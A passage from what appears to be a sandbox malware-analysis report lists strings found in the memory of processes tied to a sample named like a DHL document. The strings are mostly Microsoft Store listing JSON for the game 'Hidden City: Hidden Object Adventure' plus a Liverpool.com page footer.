","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000023.00000003.473525877.000001EB1036D000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000023.00000003.473971258.000001EB1037E000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 00000023.00000003.473971258.000001EB1037E000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 00000023.00000003.473971258.000001EB1037E000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":507060394,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6","PackageId":"448e913e-e6bd-69c2-2c7f-25b80795f801-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.40.4001.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 00000023.00000003.474637686.000001EB103BB000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000023.00000003.474637686.000001EB103BB000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000023.00000003.474637686.000001EB103BB000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer\|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer\|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer\|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer\|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook\|follow\|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter\|follow\|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections & Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
Source: DHL_document11022020680908911.exe, 00000000.00000003.236846972.000000000401A000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.347598432.0000000006D7C000.00000004.00000001.sdmp, dhcpmon.exe, 00000016.00000003.414915472.0000000006252000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.404036386.0000000007AFC000.00000004.00000001.sdmp	String found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer\|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer\|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer\|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer\|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" 